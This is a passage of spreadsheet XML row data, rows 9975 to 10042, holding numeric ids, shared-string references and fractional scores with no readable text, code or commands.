        <v>2.5970903E7</v>
      </c>
      <c r="C9975" s="2" t="s">
        <v>9536</v>
      </c>
      <c r="D9975" s="2">
        <v>1.0</v>
      </c>
      <c r="E9975" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9975" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="9976" ht="15.75" customHeight="1">
      <c r="A9976" s="1">
        <v>14326.0</v>
      </c>
      <c r="B9976" s="2">
        <v>3.8741544E7</v>
      </c>
      <c r="C9976" s="2" t="s">
        <v>9537</v>
      </c>
      <c r="D9976" s="2">
        <v>1.0</v>
      </c>
      <c r="E9976" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9976" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="9977" ht="15.75" customHeight="1">
      <c r="A9977" s="1">
        <v>17157.0</v>
      </c>
      <c r="B9977" s="2">
        <v>4.8885036E7</v>
      </c>
      <c r="C9977" s="2" t="s">
        <v>9538</v>
      </c>
      <c r="D9977" s="2">
        <v>1.0</v>
      </c>
      <c r="E9977" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9977" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="9978" ht="15.75" customHeight="1">
      <c r="A9978" s="1">
        <v>19656.0</v>
      </c>
      <c r="B9978" s="2">
        <v>5.6346981E7</v>
      </c>
      <c r="C9978" s="2" t="s">
        <v>9539</v>
      </c>
      <c r="D9978" s="2">
        <v>1.0</v>
      </c>
      <c r="E9978" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9978" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="9979" ht="15.75" customHeight="1">
      <c r="A9979" s="1">
        <v>2969.0</v>
      </c>
      <c r="B9979" s="2">
        <v>3.6084057E7</v>
      </c>
      <c r="C9979" s="2" t="s">
        <v>9540</v>
      </c>
      <c r="D9979" s="2">
        <v>1.0</v>
      </c>
      <c r="E9979" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9979" s="2">
        <v>0.1045197740112995</v>
      </c>
    </row>
    <row r="9980" ht="15.75" customHeight="1">
      <c r="A9980" s="1">
        <v>2309.0</v>
      </c>
      <c r="B9980" s="2">
        <v>3280203.0</v>
      </c>
      <c r="C9980" s="2" t="s">
        <v>9541</v>
      </c>
      <c r="D9980" s="2">
        <v>1.0</v>
      </c>
      <c r="E9980" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9980" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9981" ht="15.75" customHeight="1">
      <c r="A9981" s="1">
        <v>2723.0</v>
      </c>
      <c r="B9981" s="2">
        <v>3.494083E7</v>
      </c>
      <c r="C9981" s="2" t="s">
        <v>9542</v>
      </c>
      <c r="D9981" s="2">
        <v>1.0</v>
      </c>
      <c r="E9981" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9981" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9982" ht="15.75" customHeight="1">
      <c r="A9982" s="1">
        <v>9943.0</v>
      </c>
      <c r="B9982" s="2">
        <v>5.6875325E7</v>
      </c>
      <c r="C9982" s="2" t="s">
        <v>9543</v>
      </c>
      <c r="D9982" s="2">
        <v>1.0</v>
      </c>
      <c r="E9982" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9982" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9983" ht="15.75" customHeight="1">
      <c r="A9983" s="1">
        <v>10485.0</v>
      </c>
      <c r="B9983" s="2">
        <v>1.1007392E7</v>
      </c>
      <c r="C9983" s="2" t="s">
        <v>9544</v>
      </c>
      <c r="D9983" s="2">
        <v>1.0</v>
      </c>
      <c r="E9983" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9983" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9984" ht="15.75" customHeight="1">
      <c r="A9984" s="1">
        <v>10854.0</v>
      </c>
      <c r="B9984" s="2">
        <v>1.6249229E7</v>
      </c>
      <c r="C9984" s="2" t="s">
        <v>9545</v>
      </c>
      <c r="D9984" s="2">
        <v>1.0</v>
      </c>
      <c r="E9984" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9984" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9985" ht="15.75" customHeight="1">
      <c r="A9985" s="1">
        <v>11575.0</v>
      </c>
      <c r="B9985" s="2">
        <v>2.2784318E7</v>
      </c>
      <c r="C9985" s="2" t="s">
        <v>9546</v>
      </c>
      <c r="D9985" s="2">
        <v>1.0</v>
      </c>
      <c r="E9985" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9985" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9986" ht="15.75" customHeight="1">
      <c r="A9986" s="1">
        <v>15328.0</v>
      </c>
      <c r="B9986" s="2">
        <v>4.2538442E7</v>
      </c>
      <c r="C9986" s="2" t="s">
        <v>9547</v>
      </c>
      <c r="D9986" s="2">
        <v>1.0</v>
      </c>
      <c r="E9986" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9986" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9987" ht="15.75" customHeight="1">
      <c r="A9987" s="1">
        <v>15495.0</v>
      </c>
      <c r="B9987" s="2">
        <v>4.3201183E7</v>
      </c>
      <c r="C9987" s="2" t="s">
        <v>6802</v>
      </c>
      <c r="D9987" s="2">
        <v>1.0</v>
      </c>
      <c r="E9987" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9987" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9988" ht="15.75" customHeight="1">
      <c r="A9988" s="1">
        <v>20152.0</v>
      </c>
      <c r="B9988" s="2">
        <v>1.0204736E7</v>
      </c>
      <c r="C9988" s="2" t="s">
        <v>9548</v>
      </c>
      <c r="D9988" s="2">
        <v>1.0</v>
      </c>
      <c r="E9988" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9988" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9989" ht="15.75" customHeight="1">
      <c r="A9989" s="1">
        <v>27046.0</v>
      </c>
      <c r="B9989" s="2">
        <v>2.0233496E7</v>
      </c>
      <c r="C9989" s="2" t="s">
        <v>9549</v>
      </c>
      <c r="D9989" s="2">
        <v>1.0</v>
      </c>
      <c r="E9989" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9989" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9990" ht="15.75" customHeight="1">
      <c r="A9990" s="1">
        <v>28739.0</v>
      </c>
      <c r="B9990" s="2">
        <v>2.8057486E7</v>
      </c>
      <c r="C9990" s="2" t="s">
        <v>9550</v>
      </c>
      <c r="D9990" s="2">
        <v>1.0</v>
      </c>
      <c r="E9990" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9990" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9991" ht="15.75" customHeight="1">
      <c r="A9991" s="1">
        <v>30258.0</v>
      </c>
      <c r="B9991" s="2">
        <v>3.7619868E7</v>
      </c>
      <c r="C9991" s="2" t="s">
        <v>9551</v>
      </c>
      <c r="D9991" s="2">
        <v>1.0</v>
      </c>
      <c r="E9991" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9991" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9992" ht="15.75" customHeight="1">
      <c r="A9992" s="1">
        <v>30716.0</v>
      </c>
      <c r="B9992" s="2">
        <v>4.32459E7</v>
      </c>
      <c r="C9992" s="2" t="s">
        <v>9552</v>
      </c>
      <c r="D9992" s="2">
        <v>1.0</v>
      </c>
      <c r="E9992" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9992" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9993" ht="15.75" customHeight="1">
      <c r="A9993" s="1">
        <v>32353.0</v>
      </c>
      <c r="B9993" s="2">
        <v>5.5932823E7</v>
      </c>
      <c r="C9993" s="2" t="s">
        <v>9553</v>
      </c>
      <c r="D9993" s="2">
        <v>1.0</v>
      </c>
      <c r="E9993" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9993" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9994" ht="15.75" customHeight="1">
      <c r="A9994" s="1">
        <v>33357.0</v>
      </c>
      <c r="B9994" s="2">
        <v>7619905.0</v>
      </c>
      <c r="C9994" s="2" t="s">
        <v>9554</v>
      </c>
      <c r="D9994" s="2">
        <v>1.0</v>
      </c>
      <c r="E9994" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9994" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9995" ht="15.75" customHeight="1">
      <c r="A9995" s="1">
        <v>33607.0</v>
      </c>
      <c r="B9995" s="2">
        <v>8341559.0</v>
      </c>
      <c r="C9995" s="2" t="s">
        <v>9555</v>
      </c>
      <c r="D9995" s="2">
        <v>1.0</v>
      </c>
      <c r="E9995" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9995" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="9996" ht="15.75" customHeight="1">
      <c r="A9996" s="1">
        <v>5840.0</v>
      </c>
      <c r="B9996" s="2">
        <v>4.6923482E7</v>
      </c>
      <c r="C9996" s="2" t="s">
        <v>9556</v>
      </c>
      <c r="D9996" s="2">
        <v>1.0</v>
      </c>
      <c r="E9996" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9996" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="9997" ht="15.75" customHeight="1">
      <c r="A9997" s="1">
        <v>14730.0</v>
      </c>
      <c r="B9997" s="2">
        <v>4.0678398E7</v>
      </c>
      <c r="C9997" s="2" t="s">
        <v>9557</v>
      </c>
      <c r="D9997" s="2">
        <v>1.0</v>
      </c>
      <c r="E9997" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9997" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="9998" ht="15.75" customHeight="1">
      <c r="A9998" s="1">
        <v>7521.0</v>
      </c>
      <c r="B9998" s="2">
        <v>5.1411015E7</v>
      </c>
      <c r="C9998" s="2" t="s">
        <v>9558</v>
      </c>
      <c r="D9998" s="2">
        <v>1.0</v>
      </c>
      <c r="E9998" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9998" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="9999" ht="15.75" customHeight="1">
      <c r="A9999" s="1">
        <v>8695.0</v>
      </c>
      <c r="B9999" s="2">
        <v>5.442322E7</v>
      </c>
      <c r="C9999" s="2" t="s">
        <v>9559</v>
      </c>
      <c r="D9999" s="2">
        <v>1.0</v>
      </c>
      <c r="E9999" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9999" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="10000" ht="15.75" customHeight="1">
      <c r="A10000" s="1">
        <v>13952.0</v>
      </c>
      <c r="B10000" s="2">
        <v>3.7281746E7</v>
      </c>
      <c r="C10000" s="2" t="s">
        <v>9560</v>
      </c>
      <c r="D10000" s="2">
        <v>1.0</v>
      </c>
      <c r="E10000" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10000" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="10001" ht="15.75" customHeight="1">
      <c r="A10001" s="1">
        <v>5366.0</v>
      </c>
      <c r="B10001" s="2">
        <v>4.5381227E7</v>
      </c>
      <c r="C10001" s="2" t="s">
        <v>9561</v>
      </c>
      <c r="D10001" s="2">
        <v>1.0</v>
      </c>
      <c r="E10001" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10001" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="10002" ht="15.75" customHeight="1">
      <c r="A10002" s="1">
        <v>7529.0</v>
      </c>
      <c r="B10002" s="2">
        <v>5.1457893E7</v>
      </c>
      <c r="C10002" s="2" t="s">
        <v>9562</v>
      </c>
      <c r="D10002" s="2">
        <v>1.0</v>
      </c>
      <c r="E10002" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10002" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="10003" ht="15.75" customHeight="1">
      <c r="A10003" s="1">
        <v>12178.0</v>
      </c>
      <c r="B10003" s="2">
        <v>2.7456862E7</v>
      </c>
      <c r="C10003" s="2" t="s">
        <v>9563</v>
      </c>
      <c r="D10003" s="2">
        <v>1.0</v>
      </c>
      <c r="E10003" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10003" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="10004" ht="15.75" customHeight="1">
      <c r="A10004" s="1">
        <v>13781.0</v>
      </c>
      <c r="B10004" s="2">
        <v>3.6560484E7</v>
      </c>
      <c r="C10004" s="2" t="s">
        <v>9564</v>
      </c>
      <c r="D10004" s="2">
        <v>1.0</v>
      </c>
      <c r="E10004" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10004" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="10005" ht="15.75" customHeight="1">
      <c r="A10005" s="1">
        <v>10871.0</v>
      </c>
      <c r="B10005" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C10005" s="2" t="s">
        <v>9565</v>
      </c>
      <c r="D10005" s="2">
        <v>1.0</v>
      </c>
      <c r="E10005" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10005" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="10006" ht="15.75" customHeight="1">
      <c r="A10006" s="1">
        <v>12420.0</v>
      </c>
      <c r="B10006" s="2">
        <v>2.9134099E7</v>
      </c>
      <c r="C10006" s="2" t="s">
        <v>9566</v>
      </c>
      <c r="D10006" s="2">
        <v>1.0</v>
      </c>
      <c r="E10006" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10006" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="10007" ht="15.75" customHeight="1">
      <c r="A10007" s="1">
        <v>17643.0</v>
      </c>
      <c r="B10007" s="2">
        <v>5.0404425E7</v>
      </c>
      <c r="C10007" s="2" t="s">
        <v>9567</v>
      </c>
      <c r="D10007" s="2">
        <v>1.0</v>
      </c>
      <c r="E10007" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10007" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="10008" ht="15.75" customHeight="1">
      <c r="A10008" s="1">
        <v>21039.0</v>
      </c>
      <c r="B10008" s="2">
        <v>1.7623992E7</v>
      </c>
      <c r="C10008" s="2" t="s">
        <v>9568</v>
      </c>
      <c r="D10008" s="2">
        <v>1.0</v>
      </c>
      <c r="E10008" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10008" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="10009" ht="15.75" customHeight="1">
      <c r="A10009" s="1">
        <v>25102.0</v>
      </c>
      <c r="B10009" s="2">
        <v>1.2949695E7</v>
      </c>
      <c r="C10009" s="2" t="s">
        <v>9569</v>
      </c>
      <c r="D10009" s="2">
        <v>1.0</v>
      </c>
      <c r="E10009" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10009" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="10010" ht="15.75" customHeight="1">
      <c r="A10010" s="1">
        <v>330.0</v>
      </c>
      <c r="B10010" s="2">
        <v>1.577624E7</v>
      </c>
      <c r="C10010" s="2" t="s">
        <v>9570</v>
      </c>
      <c r="D10010" s="2">
        <v>1.0</v>
      </c>
      <c r="E10010" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10010" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10011" ht="15.75" customHeight="1">
      <c r="A10011" s="1">
        <v>2510.0</v>
      </c>
      <c r="B10011" s="2">
        <v>3.3981423E7</v>
      </c>
      <c r="C10011" s="2" t="s">
        <v>9571</v>
      </c>
      <c r="D10011" s="2">
        <v>1.0</v>
      </c>
      <c r="E10011" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10011" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10012" ht="15.75" customHeight="1">
      <c r="A10012" s="1">
        <v>5505.0</v>
      </c>
      <c r="B10012" s="2">
        <v>4.5830061E7</v>
      </c>
      <c r="C10012" s="2" t="s">
        <v>9572</v>
      </c>
      <c r="D10012" s="2">
        <v>1.0</v>
      </c>
      <c r="E10012" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10012" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10013" ht="15.75" customHeight="1">
      <c r="A10013" s="1">
        <v>6971.0</v>
      </c>
      <c r="B10013" s="2">
        <v>5.0004263E7</v>
      </c>
      <c r="C10013" s="2" t="s">
        <v>9573</v>
      </c>
      <c r="D10013" s="2">
        <v>1.0</v>
      </c>
      <c r="E10013" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10013" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10014" ht="15.75" customHeight="1">
      <c r="A10014" s="1">
        <v>7975.0</v>
      </c>
      <c r="B10014" s="2">
        <v>5.2706694E7</v>
      </c>
      <c r="C10014" s="2" t="s">
        <v>9574</v>
      </c>
      <c r="D10014" s="2">
        <v>1.0</v>
      </c>
      <c r="E10014" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10014" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10015" ht="15.75" customHeight="1">
      <c r="A10015" s="1">
        <v>14267.0</v>
      </c>
      <c r="B10015" s="2">
        <v>3.840275E7</v>
      </c>
      <c r="C10015" s="2" t="s">
        <v>9575</v>
      </c>
      <c r="D10015" s="2">
        <v>1.0</v>
      </c>
      <c r="E10015" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10015" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10016" ht="15.75" customHeight="1">
      <c r="A10016" s="1">
        <v>15130.0</v>
      </c>
      <c r="B10016" s="2">
        <v>4.1896815E7</v>
      </c>
      <c r="C10016" s="2" t="s">
        <v>9576</v>
      </c>
      <c r="D10016" s="2">
        <v>1.0</v>
      </c>
      <c r="E10016" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10016" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10017" ht="15.75" customHeight="1">
      <c r="A10017" s="1">
        <v>15588.0</v>
      </c>
      <c r="B10017" s="2">
        <v>4.3442267E7</v>
      </c>
      <c r="C10017" s="2" t="s">
        <v>9577</v>
      </c>
      <c r="D10017" s="2">
        <v>1.0</v>
      </c>
      <c r="E10017" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10017" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10018" ht="15.75" customHeight="1">
      <c r="A10018" s="1">
        <v>17014.0</v>
      </c>
      <c r="B10018" s="2">
        <v>4843446.0</v>
      </c>
      <c r="C10018" s="2" t="s">
        <v>9578</v>
      </c>
      <c r="D10018" s="2">
        <v>1.0</v>
      </c>
      <c r="E10018" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10018" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10019" ht="15.75" customHeight="1">
      <c r="A10019" s="1">
        <v>18541.0</v>
      </c>
      <c r="B10019" s="2">
        <v>5.3119254E7</v>
      </c>
      <c r="C10019" s="2" t="s">
        <v>9579</v>
      </c>
      <c r="D10019" s="2">
        <v>1.0</v>
      </c>
      <c r="E10019" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10019" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10020" ht="15.75" customHeight="1">
      <c r="A10020" s="1">
        <v>18959.0</v>
      </c>
      <c r="B10020" s="2">
        <v>5.435524E7</v>
      </c>
      <c r="C10020" s="2" t="s">
        <v>9580</v>
      </c>
      <c r="D10020" s="2">
        <v>1.0</v>
      </c>
      <c r="E10020" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10020" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10021" ht="15.75" customHeight="1">
      <c r="A10021" s="1">
        <v>20832.0</v>
      </c>
      <c r="B10021" s="2">
        <v>1.5513397E7</v>
      </c>
      <c r="C10021" s="2" t="s">
        <v>9581</v>
      </c>
      <c r="D10021" s="2">
        <v>1.0</v>
      </c>
      <c r="E10021" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10021" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10022" ht="15.75" customHeight="1">
      <c r="A10022" s="1">
        <v>21378.0</v>
      </c>
      <c r="B10022" s="2">
        <v>2.1660734E7</v>
      </c>
      <c r="C10022" s="2" t="s">
        <v>9582</v>
      </c>
      <c r="D10022" s="2">
        <v>1.0</v>
      </c>
      <c r="E10022" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10022" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10023" ht="15.75" customHeight="1">
      <c r="A10023" s="1">
        <v>33756.0</v>
      </c>
      <c r="B10023" s="2">
        <v>8605420.0</v>
      </c>
      <c r="C10023" s="2" t="s">
        <v>9583</v>
      </c>
      <c r="D10023" s="2">
        <v>1.0</v>
      </c>
      <c r="E10023" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10023" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10024" ht="15.75" customHeight="1">
      <c r="A10024" s="1">
        <v>34006.0</v>
      </c>
      <c r="B10024" s="2">
        <v>9486641.0</v>
      </c>
      <c r="C10024" s="2" t="s">
        <v>9584</v>
      </c>
      <c r="D10024" s="2">
        <v>1.0</v>
      </c>
      <c r="E10024" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10024" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="10025" ht="15.75" customHeight="1">
      <c r="A10025" s="1">
        <v>92.0</v>
      </c>
      <c r="B10025" s="2">
        <v>1.2095041E7</v>
      </c>
      <c r="C10025" s="2" t="s">
        <v>9585</v>
      </c>
      <c r="D10025" s="2">
        <v>1.0</v>
      </c>
      <c r="E10025" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10025" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10026" ht="15.75" customHeight="1">
      <c r="A10026" s="1">
        <v>891.0</v>
      </c>
      <c r="B10026" s="2">
        <v>2.2020131E7</v>
      </c>
      <c r="C10026" s="2" t="s">
        <v>9586</v>
      </c>
      <c r="D10026" s="2">
        <v>1.0</v>
      </c>
      <c r="E10026" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10026" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10027" ht="15.75" customHeight="1">
      <c r="A10027" s="1">
        <v>1478.0</v>
      </c>
      <c r="B10027" s="2">
        <v>2.7121485E7</v>
      </c>
      <c r="C10027" s="2" t="s">
        <v>9587</v>
      </c>
      <c r="D10027" s="2">
        <v>1.0</v>
      </c>
      <c r="E10027" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10027" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10028" ht="15.75" customHeight="1">
      <c r="A10028" s="1">
        <v>2322.0</v>
      </c>
      <c r="B10028" s="2">
        <v>3.2889406E7</v>
      </c>
      <c r="C10028" s="2" t="s">
        <v>9588</v>
      </c>
      <c r="D10028" s="2">
        <v>1.0</v>
      </c>
      <c r="E10028" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10028" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10029" ht="15.75" customHeight="1">
      <c r="A10029" s="1">
        <v>3176.0</v>
      </c>
      <c r="B10029" s="2">
        <v>3.7094023E7</v>
      </c>
      <c r="C10029" s="2" t="s">
        <v>9589</v>
      </c>
      <c r="D10029" s="2">
        <v>1.0</v>
      </c>
      <c r="E10029" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10029" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10030" ht="15.75" customHeight="1">
      <c r="A10030" s="1">
        <v>3404.0</v>
      </c>
      <c r="B10030" s="2">
        <v>3.8032012E7</v>
      </c>
      <c r="C10030" s="2" t="s">
        <v>9590</v>
      </c>
      <c r="D10030" s="2">
        <v>1.0</v>
      </c>
      <c r="E10030" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10030" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10031" ht="15.75" customHeight="1">
      <c r="A10031" s="1">
        <v>6797.0</v>
      </c>
      <c r="B10031" s="2">
        <v>4.9517894E7</v>
      </c>
      <c r="C10031" s="2" t="s">
        <v>9591</v>
      </c>
      <c r="D10031" s="2">
        <v>1.0</v>
      </c>
      <c r="E10031" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10031" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10032" ht="15.75" customHeight="1">
      <c r="A10032" s="1">
        <v>7400.0</v>
      </c>
      <c r="B10032" s="2">
        <v>5.1104232E7</v>
      </c>
      <c r="C10032" s="2" t="s">
        <v>9592</v>
      </c>
      <c r="D10032" s="2">
        <v>1.0</v>
      </c>
      <c r="E10032" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10032" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10033" ht="15.75" customHeight="1">
      <c r="A10033" s="1">
        <v>10797.0</v>
      </c>
      <c r="B10033" s="2">
        <v>1.5736248E7</v>
      </c>
      <c r="C10033" s="2" t="s">
        <v>9593</v>
      </c>
      <c r="D10033" s="2">
        <v>1.0</v>
      </c>
      <c r="E10033" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10033" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10034" ht="15.75" customHeight="1">
      <c r="A10034" s="1">
        <v>12411.0</v>
      </c>
      <c r="B10034" s="2">
        <v>2.9064663E7</v>
      </c>
      <c r="C10034" s="2" t="s">
        <v>9594</v>
      </c>
      <c r="D10034" s="2">
        <v>1.0</v>
      </c>
      <c r="E10034" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10034" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10035" ht="15.75" customHeight="1">
      <c r="A10035" s="1">
        <v>14357.0</v>
      </c>
      <c r="B10035" s="2">
        <v>3.8937165E7</v>
      </c>
      <c r="C10035" s="2" t="s">
        <v>9595</v>
      </c>
      <c r="D10035" s="2">
        <v>1.0</v>
      </c>
      <c r="E10035" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10035" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10036" ht="15.75" customHeight="1">
      <c r="A10036" s="1">
        <v>17660.0</v>
      </c>
      <c r="B10036" s="2">
        <v>5.0441437E7</v>
      </c>
      <c r="C10036" s="2" t="s">
        <v>9596</v>
      </c>
      <c r="D10036" s="2">
        <v>1.0</v>
      </c>
      <c r="E10036" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10036" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10037" ht="15.75" customHeight="1">
      <c r="A10037" s="1">
        <v>19068.0</v>
      </c>
      <c r="B10037" s="2">
        <v>5.4603869E7</v>
      </c>
      <c r="C10037" s="2" t="s">
        <v>9597</v>
      </c>
      <c r="D10037" s="2">
        <v>1.0</v>
      </c>
      <c r="E10037" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10037" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="10038" ht="15.75" customHeight="1">
      <c r="A10038" s="1">
        <v>1490.0</v>
      </c>
      <c r="B10038" s="2">
        <v>2.7199828E7</v>
      </c>
      <c r="C10038" s="2" t="s">
        <v>9598</v>
      </c>
      <c r="D10038" s="2">
        <v>1.0</v>
      </c>
      <c r="E10038" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10038" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="10039" ht="15.75" customHeight="1">
      <c r="A10039" s="1">
        <v>2047.0</v>
      </c>
      <c r="B10039" s="2">
        <v>3.0935569E7</v>
      </c>
      <c r="C10039" s="2" t="s">
        <v>9599</v>
      </c>
      <c r="D10039" s="2">
        <v>1.0</v>
      </c>
      <c r="E10039" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10039" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="10040" ht="15.75" customHeight="1">
      <c r="A10040" s="1">
        <v>4014.0</v>
      </c>
      <c r="B10040" s="2">
        <v>4.0922871E7</v>
      </c>
      <c r="C10040" s="2" t="s">
        <v>9600</v>
      </c>
      <c r="D10040" s="2">
        <v>1.0</v>
      </c>
      <c r="E10040" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10040" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="10041" ht="15.75" customHeight="1">
      <c r="A10041" s="1">
        <v>8171.0</v>
      </c>
      <c r="B10041" s="2">
        <v>5.3233018E7</v>
      </c>
      <c r="C10041" s="2" t="s">
        <v>9601</v>
      </c>
      <c r="D10041" s="2">
        <v>1.0</v>
      </c>
      <c r="E10041" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10041" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="10042" ht="15.75" customHeight="1">
      <c r="A10042" s="1">
        <v>10040.0</v>
      </c>
      <c r="B10042" s="2">
        <v>5.7072071E7</v>
